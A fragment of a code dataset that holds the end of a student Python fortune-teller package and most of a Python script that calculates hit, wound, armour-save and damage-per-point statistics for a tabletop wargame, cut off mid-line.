can't control others\",\n \"Find your own happy\",\n \"Don't react, respond\",\n \"Meditate on it\"\n ]\n if seed is not None:\n random.seed(seed)\n\n if (type == \"learning\"):\n return random.choice(learning)\n\n elif (type == \"detach\"):\n return random.choice(detach)\n\n\ndef getCSFortune(question, debug, seed=None):\n '''\n Return CS fortune or debugging help\n '''\n if seed is not None:\n random.seed(seed)\n possibleErrors = [\n \"You forgot a semicolon\",\n \"You forgot to close a bracket\",\n \"You misspelled a keyword\",\n \"Incorrect indentation\",\n \"Incorrect version\",\n \"There is no saving this one\"\n ]\n var = random.random() * 10\n #print(var);\n if var >= 5:\n if debug:\n return random.choice(possibleErrors)\n else:\n days = int(random.random() * 100) + 1\n return \"You are on the right track and will finish your assignment/project in \" + str(days) + \" days.\"\n else:\n return \"You are screwed. Switch major. Go next.\"\n\ndef getInspiration(name):\n '''\n Returns inspirational quotes\n '''\n quotes = {\n \"Lemony Snicket\": [\n \"Do the scary thing first, and get scared later.\",\n \"All cannot be lost when there is still so much being found.\",\n \"When things don\\'t go right, go left.\",\n \"Sometimes the things you\\'ve lost can be found again in unexpected places.\"\n ],\n \"Amelia Earhart\": [\n \"The most difficult thing is the decision to act, the rest is merely tenacity.\"\n ],\n \"Angela Bassett\": [\n (\"Don't settle for average. Bring your best to the moment. Then, whether it fails or succeeds, \"\n \"at least you know you gave all you had.\")\n ],\n \"Barbara Elaine Smith\": [\n \"I have stood on a mountain of no\\'s for one yes.\"\n ],\n \"Mary Anne Radmacher\": [\n (\"Courage doesn't always roar. Sometimes courage is a quiet voice at the end of the day saying, \"\n \"\\\"I will try again tomorrow.\\\"\")\n ],\n \"Maya Angelou\": [\n (\"Courage is the most important of all the virtues because without courage, \"\n \"you can't practice any other virtue consistently.\")\n ],\n \"Frederick Douglass\": [\n \"If there is no struggle, there is no progress.\"\n ]\n }\n\n if name in quotes.keys():\n quote = random.choice(quotes.get(name))\n elif name == \"\":\n someName = random.choice(list(quotes.keys()))\n quote = random.choice(quotes.get(someName))\n else:\n print(\"Sorry, we don\\'t seem to have any quotes from anyone by that name yet!\\n\")\n quote = \"NO SUCH AUTHOR\"\n\n return quote\n\n\ndef funny(name):\n '''\n Returns happy/funny quotes\n '''\n quotes = {\n\n \"Steven Wright\": [\"I wish the first word I ever said was the word quote, so right before I die I could say unquote.\"],\n\n \"Issac Asimov\": [\"Though sleep is called our best friend, it is a friend who often keeps us waiting!\"],\n\n \"Leo Tolstoy\": [\"Happiness is an allegory, unhappiness a story.\"],\n\n \"J.K Rowling\": [\"Happiness can be found even in the darkest of times; if only one remembers to turn on the light.\"],\n\n \"Oscar Wilde\": [\"Some cause happiness wherever they go; others, whenever they go.\"],\n\n \"Mark Twain\": [\"When your friends begin to flatter you on how young you look, it's a sure sign you're getting old.\"]\n }\n\n if name in quotes.keys():\n return random.choice(quotes.get(name))\n elif name == \"\":\n return random.choice(quotes.get(random.choice(list(quotes.keys()))))\n else:\n return \"The author doesn't exist\"\n","repo_name":"software-students-fall2022/python-package-exercise-project-3-team-16","sub_path":"src/fortunetelleracs1029/fortuneteller.py","file_name":"fortuneteller.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13646931789","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 5 13:46:46 2023\r\n\r\n@author: pwint\r\n\"\"\"\r\nimport copy as c\r\nimport numpy as np\r\n#import pathlib as pl\r\nimport pprint as pp\r\n\r\ndef ptohit(off,_def,mod=0): # chance to hit with melee weapon\r\n if off-_def>=4:\r\n p=(5+mod)/6\r\n elif off-_def>=1:\r\n p=(4+mod)/6\r\n elif off-_def>=-3:\r\n p=(3+mod)/6\r\n elif off-_def>=-7:\r\n p=(2+mod)/6\r\n else:\r\n p=(1+mod)/6\r\n if p>5/6:\r\n return 5/6\r\n elif p>=1/6:\r\n return p\r\n else:\r\n return 1/6\r\n\r\ndef paim(aim): # chance to hit with missile weapon\r\n if aim>8:\r\n return 0/6\r\n elif aim>=7:\r\n return 1/12\r\n else:\r\n return min((7-aim)/6,5/6)\r\n\r\ndef ptowound(_str,res,mod=0): # chance to wound\r\n if _str-res>=2:\r\n p=(5+mod)/6\r\n elif _str-res>=1:\r\n p=(4+mod)/6\r\n elif _str-res>=0:\r\n p=(3+mod)/6\r\n elif _str-res>=-1:\r\n p=(2+mod)/6\r\n else:\r\n p=(1+mod)/6\r\n if p>5/6:\r\n return 5/6\r\n elif p>=1/6:\r\n return p\r\n else:\r\n return 1/6\r\n \r\ndef n_ptoarm(ap,arm): # chance to fail armour save\r\n if ap>arm:\r\n return 6/6\r\n else:\r\n return max(1-(arm-ap)/6,1/6)\r\n \r\navgdmg_me=lambda off,_str,ap,_def,res,arm,hmod=0,wmod=0: ptohit(off,_def,hmod)*ptowound(_str,res,wmod)*n_ptoarm(ap,arm)\r\navgdmg_autohits=lambda n,_str,ap,res,arm,wmod=0:n*ptowound(_str, res,wmod)*n_ptoarm(ap,arm)\r\navgdmg_mi=lambda aim,_str,ap,res,arm,wmod=0: paim(aim)*ptowound(_str, res,wmod)*n_ptoarm(ap, arm)\r\navgdmgpt=lambda dmg,pt: dmg/pt\r\n\r\ndef show_me(l1):\r\n l2=c.copy(np.array(l1).round(2).tolist())\r\n ltest=c.copy([6*[\"def\",\"res\",\"arm\",\"dmg\",\"norm\"]])\r\n for i in range(35):\r\n # ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=c.copy(l2[i+35*j])\r\n ltest.append(ltemp)\r\n string=6*\"{: >7} {: >5} {: >5} {: >5} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_surv_me(l1):\r\n l2=c.copy(np.array(l1).round(2).tolist())\r\n ltest=c.copy([6*[\"off\",\"str\",\"ap\",\"att\",\"norm\"]])\r\n for i in range(35):\r\n # ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=c.copy(l2[i+35*j])\r\n ltest.append(ltemp)\r\n string=6*\"{: >7} {: >5} {: >5} {: >6} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_mi(lret):\r\n ranint=[]\r\n for i in range(0,len(lret),175): # 7 (different arm val) * 5 (different res val) * 5 (different sit) = 175 rows per range interval\r\n ranint.append(lret[i][0])\r\n ltest=[['','','','']+['','','','']+['','','','']+['','','','']+['Range','0','-',ranint[0]]]\r\n ltest.append(['','','','Normal']+['','Move','and','Shoot']+['','Stand','and','Shoot']+['','','Soft','Cover']+['','','Hard','Cover'])\r\n ltest.append(5*[\"res\",\"arm\",\"dmg\",\"norm\"])\r\n for k in range(len(ranint)): # k different range blocks\r\n lround=np.array(lret)[k*175:(k+1)*175].round(2).tolist()\r\n for i in range(int(175/5)): # 5 columns\r\n ltemp=[]\r\n if i%7 == 0 and (i!=0 or k!=0): # insert empty row\r\n ltest.append(5*['','','','',''])\r\n if int(i%175)==0 and k!=0: # new ranged interval\r\n ltest.append(['','','','']+['','','','']+['','','','']+['','','','']+['Range',ranint[k-1],'-',ranint[k]])\r\n ltest.append(['','','','Normal']+['','Move','and','Shoot']+['','Stand','and','Shoot']+['','','Soft','Cover']+['','','Hard','Cover'])\r\n ltest.append(5*[\"res\",\"arm\",\"dmg\",\"norm\"])\r\n for j in range(5): # add row to columns\r\n ltemp+=lround[i+int(175/5)*j][1:] # one column contains 175/5=35 rows\r\n ltest.append(ltemp)\r\n string=5*\"{: >7} {: >5} {: >5} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_surv_mi(l1):\r\n #l2=c.copy(np.array(l1).round(2).tolist())\r\n #ltest=[5*[\"\",\"\",\"\",\"\",\"\"]+['','','Aim','Mod','0']]\r\n ltest=[6*[\"aim\",\"str\",\"ap\",\"att\",\"norm\"]]\r\n for k in range(0,1): # aim modifiers\r\n lround=np.array(l1)[k*210:(k+1)*210].round(2).tolist()\r\n for i in range(35):\r\n # ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=lround[i+35*j]#[1:]\r\n ltest.append(ltemp)\r\n '''if k!=2:\r\n ltest.append(6*['','','','',''])\r\n ltest.append(5*[\"\",\"\",\"\",\"\",\"\"]+['','','Aim','Mod',-l1[(k+1)*210][0]])\r\n '''\r\n string=6*\"{: >7} {: >5} {: >5} {: >6} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n\r\n# treat breath as an additional modelpart with 0 attack and auto hits\r\ndef melee(att,off,_str,ap,pt,mw=1,autohits=0,hmod=0,wmod=0,test=False):\r\n l2=[]\r\n if type(att)==list: # extend optional parameters to lists\r\n if type(mw)!=list:\r\n mw=[mw for i in range(len(att))]\r\n if type(autohits)!=list:\r\n autohits=[autohits for i in range(len(att))]\r\n if type(hmod)!=list:\r\n hmod=[hmod for i in range(len(att))]\r\n if type(wmod)!=list:\r\n wmod=[wmod for i in range(len(att))]\r\n for _def in range(2,8):\r\n for res in range(2,7):\r\n for arm in range(0,7):\r\n dmg=0\r\n if type(att)==list: # Multi-part model\r\n for i in range(len(att)):\r\n #dmg+=att[i]*mw[i]*avgdmg_me(off[i],_str[i],ap[i],_def,res,arm,hmod[i],wmod[i])+avgdmg_autohits(autohits[i], _str[i], ap[i], res, arm,wmod=wmod[i])\r\n hits=att[i]*ptohit(off[i], _def,mod=hmod[i])+autohits[i]\r\n wounds=hits*ptowound(_str[i], res,mod=wmod[i])\r\n dmg+=wounds*mw[i]*n_ptoarm(ap[i], arm)\r\n else:\r\n #dmg=att*mw*avgdmg_me(off,_str,ap,_def,res,arm,hmod,wmod)+avgdmg_autohits(autohits, _str, ap, res, arm,wmod)\r\n hits=att*ptohit(off, _def,mod=hmod)+autohits\r\n wounds=hits*ptowound(_str, res,mod=wmod)\r\n dmg=wounds*mw*n_ptoarm(ap, arm)\r\n dmgpt=avgdmgpt(100*dmg,pt)\r\n l2.append([_def,res,arm,dmg,dmgpt])\r\n if test==True:\r\n show_me(l2)\r\n else:\r\n return l2\r\n \r\ndef surv_me(hp,_def,res,arm,pt,aeg=7,reg=7,test=False):\r\n lret=[]\r\n for off in range(2,8):\r\n for _str in range(2,7):\r\n for ap in range(0,7):\r\n #att=hp/((1-(7-min(aeg,reg))/6)*avgdmg_me(off,_str,ap,_def,res,arm))\r\n hits=ptohit(off, _def)\r\n wounds=hits*ptowound(_str, res)\r\n unsavedwounds=wounds*n_ptoarm(ap, arm)\r\n dmg=unsavedwounds*(1-(7-min(aeg,reg))/6)\r\n att=hp/dmg\r\n attpt=10*att/pt\r\n lret.append([off,_str,ap,att,attpt])\r\n if test==True:\r\n show_surv_me(lret)\r\n else:\r\n return lret\r\n \r\ndef missile(ran,att,aim,_str,ap,pt,mw=1,aa=1,acc=False,qtf=False,unw=False,mof=False,sta=False,rel=False,cannon=False,test=False):\r\n l2=[] \r\n if type(att)==list: # extend optional parameters to lists\r\n if type(mw)!=list:\r\n mw=[mw for i in range(len(att))]\r\n if type(aa)!=list:\r\n aa=[aa for i in range(len(att))]\r\n aim_orig=aim\r\n for i in range(2):\r\n aim=aim_orig\r\n # i=0 Short Range, i=1 Long Range\r\n if i== 1 and acc==False:\r\n aim+=1\r\n aim_ran=aim\r\n for j in range(5):\r\n aim=aim_ran\r\n # if j==0:\r\n # Normal, nothing to do\r\n # Move and Shoot\r\n if j==1 and mof==True: # Move or Fire\r\n aim=90\r\n elif j==1 and ((qtf==False and unw==False) or (qtf==True and unw==True)): # qick to fire <=> unwieldy\r\n aim+=1\r\n elif j==1 and (qtf==False and unw==True): # only unwieldy\r\n aim+=2 \r\n # Stand and Shoot\r\n elif j==2 and rel==True: # Reload!\r\n aim=90\r\n elif j==2 and sta==False:\r\n aim+=1\r\n # Soft Cover\r\n elif j==3 and cannon==False:\r\n aim+=1\r\n # Hard Cover\r\n elif j==4 and cannon==False:\r\n aim+=2\r\n for res in range(2,7):\r\n for arm in range(0,7):\r\n dmg=0\r\n if type(att)==list: # Multi-part model\r\n for i in range(len(att)):\r\n #dmg+=att[i]*mw[i]*aa[i]*avgdmg_mi(aim, _str[i], ap[i], res, arm)\r\n hits=att[i]*paim(aim)\r\n wounds=hits*aa[i]*ptowound(_str[i], res)\r\n dmg+=wounds*mw[i]*n_ptoarm(ap[i], arm)\r\n else:\r\n #dmg+=att*mw*aa*avgdmg_mi(aim, _str, ap, res, arm)\r\n hits=att*paim(aim)\r\n wounds=hits*aa*ptowound(_str, res)\r\n dmg=wounds*mw*n_ptoarm(ap, arm)\r\n dmgpt=avgdmgpt(100*dmg,pt)\r\n l2.append([ran/(2-i),res,arm,dmg,dmgpt])\r\n if test==True:\r\n show_mi(l2)\r\n else:\r\n return l2\r\n\r\ndef surv_mi(hp,res,arm,pt,aeg=7,reg=7,ht=0,test=False):\r\n lret=[]\r\n #for aimmod in range(0,3): # aimmod really neccessary?\r\n for aim in range(0,6)[::-1]:\r\n for _str in range(2,7):\r\n for ap in range(0,7):\r\n #att=hp/((1-(7-min(aeg,reg))/6)*avgdmg_mi(aim+ht, _str, ap, res, arm))\r\n hits=paim(aim+ht)\r\n wounds=hits*ptowound(_str, res)\r\n unsavedwounds=wounds*n_ptoarm(ap, arm)\r\n dmg=unsavedwounds*(1-(7-min(aeg,reg))/6)\r\n att=hp/dmg\r\n attpt=10*att/pt\r\n lret.append([aim,_str,ap,att,attpt])\r\n if test==True:\r\n show_surv_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef filter2_me(l,_def=-1,res=-1,arm=-1,test=False):\r\n lc=c.copy(l)\r\n lret=[]\r\n for i in range(len(lc)):\r\n if (lc[i][0]==_def or _def==-1) and (lc[i][1]==res or res==-1) and (lc[i][2]==arm or arm==-1):\r\n lret.append(lc[i])\r\n if test==True:\r\n ltest=[[\"def\",\"res\",\"arm\",\"dmg\",\"norm\"]]\r\n ltest.extend(np.array(lret).round(2).tolist())\r\n for row in ltest:\r\n print(\"{: >5} {: >5} {: >5} {: >5} {: >5}\".format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter2_mi(l,res=-1,arm=-1,test=False):\r\n lc=c.copy(l)\r\n lret=[]\r\n for i in range(len(lc)):\r\n if (lc[i][1]==res or res==-1) and (lc[i][2]==arm or arm==-1):\r\n lret.append(lc[i])\r\n if test==True:\r\n show_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef compare2_me(l1,l2,test=False):\r\n arra=np.array(l1)[:,3:] # get dmg and norm from l1\r\n arrb=np.array(l2)[:,3:] # get dmg and norm from l2\r\n if (arrb>0).all:\r\n arrc=(arra/arrb).copy() # calculates relative dmg/norm\r\n arrc=np.concatenate((np.array(l1)[:,:3],arrc),1)\r\n lret = arrc.tolist()\r\n if test==True:\r\n show_me(lret)\r\n else:\r\n return lret\r\n \r\ndef compare2_mi(l1,l2,test=False):\r\n arra=np.array(l1)[:,3:] # get dmg and norm from l1\r\n arrb=np.array(l2)[:,3:] # get dmg and norm from l2\r\n ranint=np.sort(np.array([l1[0][0],l1[-1][0],l2[0][0],l2[-1][0]])).tolist() # range intervals\r\n for i in ranint:\r\n if ranint.count(i)>1: # remove redunant numbers\r\n ranint.remove(i)\r\n aret=np.array([0 for i in range(5)])[None,:] # placeholder\r\n for i in ranint: # range intervals\r\n if l1[0][0]>=i: # Short Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n elif l1[-1][0]>=i: # Long Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n else: # Not in Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n aret=np.concatenate((aret,atemp))\r\n lret = aret.tolist()[1:] # remove placeholder\r\n if test==True:\r\n show_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef sorteff(l1,test=False):\r\n order=np.array(l1)[:,4].argsort(0)\r\n lret=[]\r\n for i in range(len(l1)):\r\n lret.append(l1[order[i]])\r\n lret=np.array(lret)[::-1,:].tolist()\r\n if test==True:\r\n show_me(lret)\r\n else:\r\n return lret\r\n\r\ndef compare_me(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])]\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3]\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"def\",\"res\",\"arm\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n\r\ndef compare_surv_me(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])]\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3]\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"off\",\"str\",\"ap\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"att\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n\r\ndef compare_mi(l1,l2,test=False):\r\n aval=np.array(l1)\r\n aranint=aval[:,:,0] # get ranges from all units: [[sr0,sr0,...,lr0],[sr1,...,lr1],...[srm,...lrm]]\r\n lranint=np.unique(np.concatenate((np.sort(aranint.min(1)),np.sort(aranint.max(1))))).tolist() # sorted ranges\r\n lret=[]\r\n for ran in lranint:\r\n #anorm=np.array([[] for i in range(175)])\r\n anorm=np.array([[[],[]] for i in range(175)])\r\n for unit in range(len(l1)):\r\n if aranint[unit,0]>= ran: # Short Range\r\n anorm=np.concatenate((anorm, aval[unit,:175,3:,None]),2) # dmg+norm from Short Range\r\n elif aranint[unit,-1]>=ran: # Long Range\r\n anorm=np.concatenate((anorm, aval[unit,175:,3:,None]),2) # dmg+norm from Long Range\r\n else: # Out of Range\r\n anorm=np.concatenate((anorm, [[[0],[0]] for i in range(175)]),2)\r\n order=anorm[:,1].argsort() # order of norm\r\n order3=np.array([[] for i in range(175)]) # expand order\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lran=np.concatenate(([[ran] for i in range(175)],np.array(l1)[0,:175,1:3],np.array(order3)),1).tolist()\r\n for i in range(len(lran)): # row i\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lran[i][3+3*j]=l2[int(order3[i][3*j])] # unit name\r\n lran[i][3+3*j+1]=anorm[i,0,int(order3[i][3*j+1])] # dmg\r\n lran[i][3+3*j+2]=anorm[i,1,int(order3[i][3*j+2])]/anorm[i,1,int(order3[i][3*0+2])] # determine cost effectiveness\r\n lret+=lran # add range block\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n # Header\r\n #ltest=[]\r\n ltest=[['','']+(len(l1)-1)*['','','']+['0','-',lranint[0]]]\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','','Normal'])\r\n ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n for k in range(len(lranint)):\r\n #lran2=lret[k*175:(k+1)*175]\r\n for i in range(175):\r\n if i%7 == 0 and (i!=0 or k!=0): # insert empty row\r\n ltest.append(['','']+len(l1)*['','',''])\r\n if i%35== 0 and (i!=0 or k!=0):\r\n if i==35:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['Move','and','Shoot'])\r\n elif i==70:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['Stand','and','Shoot'])\r\n elif i==105:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','Soft','Cover'])\r\n elif i==140:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','Hard','Cover'])\r\n if i==0 and k!=0: # new ranged interval\r\n ltest.append(['','']+(len(l1)-1)*['','','']+[lranint[k-1],'-',lranint[k]])\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','','Normal'])\r\n #ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n ltest.append(np.array(ltemp[i+k*175])[1:].tolist())\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n\r\ndef compare_surv_mi(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])] # unit name\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3] # dmg\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"aim\",\"str\",\"ap\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"att\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n \r\ndef filter_me(l,_def=-1,res=-1,arm=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==_def or _def==-1) and (l[i][1]==res or res==-1) and (l[i][2]==arm or arm==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"def\",\"res\",\"arm\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"dmg\",\"eff\"])\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_me_surv(l,off=-1,_str=-1,ap=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==off or off==-1) and (l[i][1]==_str or _str==-1) and (l[i][2]==ap or ap==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"off\",\"str\",\"ap\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"att\",\"eff\"])\r\n ltemp=np.array([[] for i in 